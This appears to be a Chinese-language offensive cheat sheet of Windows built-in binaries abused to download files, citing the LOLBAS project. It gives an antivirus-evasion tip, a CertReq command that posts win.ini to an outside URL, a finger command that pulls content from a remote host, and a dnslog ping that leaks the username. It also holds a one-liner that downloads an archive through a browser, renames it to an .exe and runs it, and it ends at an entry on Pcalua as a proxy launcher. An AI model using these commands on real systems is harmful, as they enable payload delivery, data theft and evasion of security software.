参考资料
https://toutiao.io/posts/uh65arq/preview
https://www.freebuf.com/system/232074.html
https://lolbas-project.github.io/
小Tips
针对一些杀软,可以cp到别的文件夹,然后重命名,或添加一些签名,可能可以运行下载的指令
半路收集的
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
finger kali@192.168.180.190 | more +8 >1.txt
https://www.slashroot.in/finger-server-configuration-linux。
0、浏览器
start firefox http://xxxxxx/demo.rar
start chrome http://xxxxxx/demo.rar
start msedge http://xxxxxx/demo.rar
上面三种都会默认下载到C:\Users\username\Downloads 这个目录下, username 是当前用户名称
ping %USERNAME%.xxx.xx.dnslog.cn 可以获取到用户名 拼接即可
一条命令
start msedge http://xxxxx/123123123.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "123123123.rar""') do set kk=%k && (set dd=%kk:123123123.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%
除了cmd /c 以外可以直接跟命令执行的
1、Pcalua
Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的⼀个组件。
pcalua.exe